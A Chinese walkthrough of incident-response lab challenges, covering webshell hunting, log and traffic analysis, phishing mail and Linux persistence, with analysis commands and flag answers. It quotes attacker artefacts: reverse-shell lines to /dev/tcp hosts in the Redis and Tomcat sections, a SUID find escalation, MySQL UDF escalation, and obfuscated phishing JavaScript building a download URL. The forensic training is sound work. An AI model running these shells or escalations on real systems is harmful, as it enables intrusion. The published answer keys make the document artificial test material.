前言:
感谢玄机平台靶机的提供,让我学到了不少东西
平台题解 :
第一章 应急响应-webshell查杀
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
ssh连接 下载/var/www/html源码(finsehll连直接下)压缩丢到河马沙箱在线查杀
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}2.黑客使用的什么工具的shell github地址的md5 flag{md5}
BeichenDream/Godzilla: 哥斯拉 (github.com)
flag{39392DE3218C333F794BEFEF07AC9257}3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
/var/www/html/include/Db/.Mysqli.php
4.黑客免杀马完整路径 md5 flag{md5}
/var/www/html/wap/top.php
第二章 日志分析-apache日志分析
1、提交当天访问次数最多的IP,即黑客IP:
cut -d- -f 1 access.log.1|uniq -c | sort -rn | head -20
192.168.200.22、黑客使用的浏览器指纹是什么,提交指纹的md5:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.363、查看index.php页面被访问的次数,提交次数:
cat access.log.1 | grep "/index.php" | wc -l
4、查看黑客IP访问了多少次,提交次数:
5、查看2023年8月03日8时这一个小时内有多少IP访问,提交次数:
第一章 应急响应-Linux日志分析
1.有多少IP在爆破主机ssh的root帐号,如果有多个使用","分割
cat /var/log/auth.log.1 | grep -a "Failed password for root" | awk '{print $11}' | sort | uniq -c | sort -nr | more
flag{192.168.200.2,192.168.200.31,192.168.200.32}2.ssh爆破成功登陆的IP是多少,如果有多个使用","分割
cat /var/log/auth.log.1 | grep -a "Accepted" | awk '{print $11}' | sort | uniq -c | sort -nr | more 
flag{192.168.200.2}3.爆破用户名字典是什么?如果有多个使用","分割
grep -a "Failed password" /var/log/auth.log.1 |perl -e 'while($_=<>){ /for(.*?) from/; print "$1\n";}' | sort | uniq -c | sort -nr | more 
flag{user,hello,root,test3,test2,test1}4.登陆成功的IP共爆破了多少次
grep -a "Failed password for root" /var/log/auth.log.1 | awk '{print $11}' | uniq -c | sort -nr | more
grep -a "Accepted " /var/log/auth.log.1 | awk '{print $11}' | uniq -c | sort -nr | more
5.黑客登陆主机后新建了一个后门用户,用户名是多少
cat /var/log/auth.log.1 |grep -a "new user"
cat /etc/passwd
flag{test2}第一章 应急响应- Linux入侵排查
1.web目录存在木马,请找到木马的密码提交
下载网页源码进行查杀
flag{1}2.服务器疑似存在不死马,请找到不死马的密码提交
5d41402abc4b2a76b9719d911017c592
hello3.不死马是通过哪个文件生成的,请提交文件名
flag{index.php}4.黑客留下了木马文件,请找出黑客的服务器ip提交
10.11.55.215.黑客留下了木马文件,请找出黑客服务器开启的监端口提交
执行shell(1).elf
netstat -antlp| grep 10.11.55.21
3333第二章 日志分析-mysql应急响应
1.黑客第一次写入的shell flag{关键字符串}
下载网站源码放到河马查杀
flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}2.黑客反弹shell的ip flag{ip}
192.168.100.13:7713.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
得到数据库账号密码
root
334cc35b3c704593ubuntu下mysql5.7用udf提权或getshell踩坑——解决udf无法执行命令 - 5gstudent - 博客园 (cnblogs.com)
登入然后
show variables like '%plugin%';查看MySQL中已加载的插件以及相关配置信息
访问/usr/lib/mysql/plugin/ 
/usr/lib/mysql/plugin/udf.so
flag{b1818bde4e310f3d23f1005185b973e7}4.黑客获取的权限 flag{whoami后的值}
mysql 服务为mysql用户启动
flag{mysql}
第二章 日志分析-redis应急响应
1.通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少
192.168.100.13出现次数较多明显是爆破
192.168.100.20是主从复制
flag{192.168.100.20}2.通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;
看到加载system,即上传exp.so
flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}3.通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;
crontab -l
/bin/sh -i >& /dev/tcp/192.168.100.13/7777 0>&14.通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交
发现keys
flag{xj-test-user-wow-you-find-flag}5.通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交
cd /usr/bin
/usr/bin 存放所有用户都可用的应用程序
ls -al
cat ps
flag{c195i2923381905517d818e313792d196}第六章 流量特征分析-蚁剑流量分析
1.木马的连接密码是多少
12.黑客执行的第一个命令是什么
右键编码“Value”位置,点击“分组字节流”,开始位置调整为“2”,解码为调整为“Base64”,查看流量包执行的命令内容,得到第一个执行的命令 "id"
id3.黑客读取了哪个文件的内容,提交文件绝对路径
flag{/etc/passwd}4.黑客上传了什么文件到服务器,提交文件名
点击第4个请求包,右键编码“Value”位置,位置,点击“分组字节流”,开始位置调整为“2”,解码为调整为“Base64”,查看流量包执行的命令内容,得到黑客上传文件名 "flag.txt"
flag{flag.txt}5.黑客上传的文件内容是什么
点击第4个请求包,右键“追踪流”->“HTTP流”,将编码复制,进行url解码
最后一段编码明显是Base64编码(解码后就是上传文件的绝对路径),猜测第二段编码为文件内容(蚁剑上传的文件会对内容进行16进制加密),进行解密得到文件内容 "flag{write_flag}"
flag{write_flag}6.黑客下载了哪个文件,提交文件绝对路径
点击第6个请求包,右键编码“Value”位置,位置,点击“分组字节流”,开始位置调整为“2”,解码为调整为“Base64”,查看流量包执行的命令内容,得到黑客下在的文件名 "config.php"
flag{/var/www/html/config.php}第五章 linux实战-CMS01
知攻善防应急靶场-Linux(2)-CSDN博客
第四章 windows实战-emlog
知攻善防应急靶场-Windows(Web1-2-3)-CSDN博客
第六章 流量特征分析-waf 上的截获
1.黑客成功登录系统的密码 flag{xxxxxxxxxxxxxxx}
admin!@#pass123
2.黑客发现的关键字符串 flag{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx}
flag{87b7cb79481f317bde90c116cf36084b}
3.黑客找到的数据库密码 flag{xxxxxxxxxxxxxxxx}
第六章 流量特征分析-常见攻击事件 tomcat
1、在web服务器上发现的可疑活动,流量分析会显示很多请求,这表明存在恶意的扫描行为,通过分析扫描的行为后提交攻击者IP flag格式:flag{ip},如:flag{127.0.0.1}
flag{14.0.0.120}2.找到攻击者IP后请通过技术手段确定其所在地址 flag格式: flag{城市英文小写}
flag{guangzhou}3.哪一个端口提供对web服务器管理面板的访问? flag格式:flag{2222}
4.经过前面对攻击者行为的分析后,攻击者运用的工具是? flag格式:flag{名称}
gobuster扫描神器 5.攻击者拿到特定目录的线索后,想要通过暴力破解的方式登录,请通过分析流量找到攻击者登录成功的用户名和密码? flag格式:flag{root-123}
我们发现HTTP Authorization 请求标头用于提供服务器验证用户代理身份的凭据,允许访问受保护的资源。
flag{admin-tomcat}6.攻击者登录成功后,先要建立反弹shell,请分析流量提交恶意文件的名称? flag格式:
http.request.method==POST //上传就是POST设置过滤器
form-data;name="deployWar";filename="JXQOZY.war"7、攻击者想要维持提权成功后的登录,请分析流量后提交关键的信息? flag提示,某种任务里的信息
随意访问外网的数据包 发现定时任务
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}第六章 流量特征分析-小王公司收到的钓鱼邮件
1.下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{xxxx.co.xxxx/w0ks//?YO=xxxxxxx}) (无需 http、https);
http://tsdandassociates.co.sz/w0ks//?YO=1702920835 
2.下载数据包文件 hacker1.pacapng,分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});
导出对象-http另存为1.zip 使用windows自带md5加密
certutil -hashfile 1.zip MD5
//f17dc5b1c30c512137e62993d1df9b2f3.下载数据包文件 hacker1.pacapng,分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?提交答案:flag{域名}(无需 http、https)
我们从流量包中保存的zip文件,解压后发现Nuj.js有字符串拼接的代码
其中一段如下:
o457607380 = '';
o457607380+='h';
o457607380+='t';
o457607380+='t';
o457607380+='p';
o457607380+='s';
o457607380+=':';
o457607380+='/';
o457607380+='/';
o457607380+='s';
o457607380+='h';
o457607380+='a';
o457607380+='k';
o457607380+='y';
o457607380+='a';
o457607380+='s';
o457607380+='t';
o457607380+='a';
o457607380+='t';
o457607380+='u';
o457607380+='e';
o457607380+='s';
o457607380+='t';
o457607380+='r';
o457607380+='a';
o457607380+='d';
o457607380+='e';
o457607380+='.';
o457607380+='c';
o457607380+='o';
o457607380+='m';
o457607380+='/';
o457607380+='A';
o457607380+='6';
o457607380+='F';
o457607380+='/';
o457607380+='6';
o457607380+='1';
o457607380+='6';
o457607380+='2';
o457607380+='3';
o457607380+='1';
o457607380+='6';
o457607380+='0';
o457607380+='3';
l988241708 = '';
l988241708+='q';
l988241708+='u';
l988241708+='i';
l988241708+='.';
l988241708+='q';即:https://shakyastatuestrade.com/A6F/616231603 得到域名
flag{shakyastatuestrade.com}第七章 常见攻击事件分析--钓鱼邮件
1.请分析获取黑客发送钓鱼邮件时使用的IP,flag格式: flag{11.22.33.44}
邮件在传输过程中会经过多个邮件服务器,每个邮件服务器都会向邮件头部的 "Received" 部分添加一条记录。因此,查看最后一个 "Received" 部分的IP地址可以更准确地找到邮件的真实发件IP地址
flag{121.204.224.15}2.请分析获取黑客钓鱼邮件中使用的木马程序的控制端IP,flag格式:flag{11.22.33.44}
在线云查杀就能直接看到ip 安恒云沙箱
3.黑客在被控服务器上创建了webshell,请分析获取webshell的文件名,请使用完整文件格式,flag格式:flag{/var/www/html/shell.php
网站文件直接丢在线websehll查杀就能发现
flag{/var/www/html/admin/ebak/ReData.php}4.黑客在被控服务器上创建了内网代理隐蔽通信隧道,请分析获取该隧道程序的文件名,请使用完整文件路径,flag格式:flag{/opt/apache2/shell}
为网络代理的配置文件,所以猜测同目录下的文件mysql就是黑客搭建的隧道工具
flag{/var/tmp/proc/mysql}第三章 权限维持-linux权限维持-隐藏
1.黑客隐藏的隐藏的文件 完整路径md5
在/tmp/.temp/文件夹下发现libprocesshider,libprocesshider是用于隐藏文件的项目
打开 /tmp/.temp/libprocesshider/processhider.c
发现隐藏了1.py
/tmp/.temp/libprocesshider/1.py2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}
打开1.py
flag{114.114.114.121:9999}3.黑客提权所用的命令 完整路径的md5 flag{md5}
查找有suid属性权限的文件
find / -perm -u=s -type f 2>/dev/null
find拥有suid权限位,尝试以find命令执行whoami
find `which find` -exec whoami \;
/usr/bin/find4. 黑客尝试注入恶意代码的工具完整路径md5
cymothoa是后门工具
黑客(红队)攻防中cymothoa后门的利用 | CN-SEC 中文网
/opt/.cymothoa-1-beta/cymothoa5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}
ibprocesshider隐藏了/tmp/.temp/libprocesshider/1.py,清除/etc/ld.so.preload之后可以看到启动命令
ps -auxef | grep 1.py题目问1.py的启动命令的可执行程序是什么,那么就是Python3,ls /usr/bin/python3 -al 看下软连接
ls /usr/bin/python3 -al
which python3.4
flag{/usr/bin/python3.4}后记:
后面接着干,持续更新 ,一起学习!!!!
![[GXYCTF 2019]Ping Ping Ping(内联执行)、[鹤城杯 2021]EasyP ($_SERVER)](https://img-blog.csdnimg.cn/direct/c982ab4ff8aa4db59ec4fdc727bda19a.png)
